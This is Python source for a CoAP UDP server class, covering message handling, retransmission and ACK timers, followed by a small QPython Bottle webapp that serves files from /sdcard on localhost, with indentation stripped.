if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(self.server_address)
def purge(self):
while not self.stopped.isSet():
self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
self._messageLayer.purge()
def listen(self, timeout=10):
"""
Listen for incoming messages. Timeout is used to check if the server must be switched off.
:param timeout: Socket Timeout in seconds
"""
self._socket.settimeout(float(timeout))
while not self.stopped.isSet():
try:
data, client_address = self._socket.recvfrom(4096)
except socket.timeout:
continue
try:
self.receive_datagram((data, client_address))
except RuntimeError:
print "Exception with Executor"
self._socket.close()
def close(self):
"""
Stop the server.
"""
logger.info("Stop server")
self.stopped.set()
for event in self.to_be_stopped:
event.set()
self._socket.close()
def receive_datagram(self, args):
"""
Receive datagram from the udp socket.
:rtype : Message
"""
data, client_address = args
serializer = Serializer()
message = serializer.deserialize(data, client_address)
if isinstance(message, int):
logger.error("receive_datagram - BAD REQUEST")
rst = Message()
rst.destination = client_address
rst.type = defines.Types["RST"]
rst.code = message
self.send_datagram(rst)
return
logger.debug("receive_datagram - " + str(message))
if isinstance(message, Request):
transaction = self._messageLayer.receive_request(message)
if transaction.request.duplicated and transaction.completed:
logger.debug("message duplicated,transaction completed")
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
elif transaction.request.duplicated and not transaction.completed:
logger.debug("message duplicated,transaction NOT completed")
self._send_ack(transaction)
return
transaction.separate_timer = self._start_separate_timer(transaction)
transaction = self._blockLayer.receive_request(transaction)
if transaction.block_transfer:
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
transaction = self._observeLayer.receive_request(transaction)
transaction = self._forwardLayer.receive_request(transaction)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
if transaction.response is not None:
if transaction.response.type == defines.Types["CON"]:
self._start_retrasmission(transaction, transaction.response)
self.send_datagram(transaction.response)
elif isinstance(message, Message):
transaction = self._messageLayer.receive_empty(message)
if transaction is not None:
transaction = self._blockLayer.receive_empty(message, transaction)
self._observeLayer.receive_empty(message, transaction)
else: # is Response
logger.error("Received response from %s", message.source)
def send_datagram(self, message):
"""
:type message: Message
:param message:
"""
if not self.stopped.isSet():
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def _start_retrasmission(self, transaction, message):
"""
:type transaction: Transaction
:param transaction:
:type message: Message
:param message:
:rtype : Future
"""
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
if message.observe is not None:
self._observeLayer.remove_subscriber(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def _start_separate_timer(self, transaction):
"""
:type transaction: Transaction
:param transaction:
:type message: Message
:param message:
:rtype : Future
"""
t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
t.start()
return t
@staticmethod
def _stop_separate_timer(timer):
"""
:type future: Future
:param future:
"""
timer.cancel()
def _send_ack(self, transaction):
# Handle separate
"""
Sends an ACK message for the request.
:param request: [request, sleep_time] or request
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.request.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
self.send_datagram(ack)
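# Server start-up sketch (illustrative; mirrors typical CoAPthon usage, 5683 being the default CoAP port):
#
#   server = CoAP(('127.0.0.1', 5683))
#   try:
#       server.listen(timeout=10)
#   except KeyboardInterrupt:
#       server.close()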
|
main.py
|
#qpy:webapp:Hello Qpython
#qpy://127.0.0.1:8080/
"""
This is a sample for qpython webapp
"""
from bottle import Bottle, ServerAdapter
from bottle import run, debug, route, error, static_file, template
######### QPYTHON WEB SERVER ###############
class MyWSGIRefServer(ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
#sys.stderr.close()
import threading
threading.Thread(target=self.server.shutdown).start()
#self.server.shutdown()
self.server.server_close() #<--- alternative but causes bad fd exception
print("# qpyhttpd stop")
######### BUILT-IN ROUTERS ###############
@route('/__exit', method=['GET','HEAD'])
def __exit():
global server
server.stop()
@route('/__ping')
def __ping():
return "ok"
@route('/assets/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='/sdcard')
######### WEBAPP ROUTERS ###############
@route('/')
def home():
return template(
'<h1>Hello {{name}} !</h1><a href="/assets/qpython/projects3/posenetOffline/index075.html">index075</a>'
,name='posenetOffline')
######### WEBAPP ROUTERS ###############
app = Bottle()
app.route('/', method='GET')(home)
app.route('/__exit', method=['GET','HEAD'])(__exit)
app.route('/__ping', method=['GET','HEAD'])(__ping)
app.route('/assets/<filepath:path>', method='GET')(server_static)
try:
server = MyWSGIRefServer(host="127.0.0.1", port="8080")
app.run(server=server,reloader=False)
except (Exception) as ex:
print("Exception: %s" % repr(ex))
|